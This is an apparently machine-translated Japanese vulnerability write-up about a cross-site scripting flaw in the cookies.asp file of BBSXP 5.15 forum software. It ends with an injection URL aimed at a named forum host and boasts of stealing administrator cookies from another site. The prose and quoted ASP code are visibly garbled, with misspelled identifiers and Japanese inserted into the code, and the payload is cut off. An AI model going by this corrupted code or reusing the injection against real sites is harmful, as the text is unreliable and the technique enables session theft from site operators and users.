BBSXP 5.15スパン攻撃の脆弱性


前書き:新雲ウェブサイトの管理システム1.02が出た時、彼の伝言はもともとスパンホールがありました。ハッカー動画をテストしました。幸いにもこの機能を開放していませんでした。そしてまたブラックソフト基地をテストしました。 なんと成功的に利用できて、新雲の公式サイトとともに管理元のcookiesを倒しました。 
思いがけないでしょう 見たところスパンは予防しなければなりません! 
BBSXPの抜け穴がこのところ爆発的になった。既存の手抜かりはみんな見たことがあるので,もう言わない。今晩はつまらないです。BBSXPを見ました。 5.15最新版のいくつかのファイルコードは、スパン攻撃の脆弱性を発見しました。 
Cookies.aspファイルのコードは以下の通りです。  
提出する “ノ」 パラメータは処理されていません。setup.aspファイルを見てください。 
if Request.Cookies(「skis」)=empy then Reponse.Cookies(「skis」)=スタイル 
dim Forum TreeList,toptrue 
ii=0 
startime=timer() 
セット rs = Server.reat Object(「ADODB.Recordset」) 
Server.Script Timeout=Timeout 'スクリプトのタイムアウト時間を設定します。 単位:秒 
レスポンス.write" " 
cookiesに提出したパラメータも処理せずにそのままwriteをdefaultに出力しました。このように、私達は論調のパラメータを構築することができます。 “ノ」にクロススクリプトコードを挿入し、クロスアタックを行う構造のようなurl:  
 http://bbs.yuzi.net/cookies.asp?menu=skins&no=4>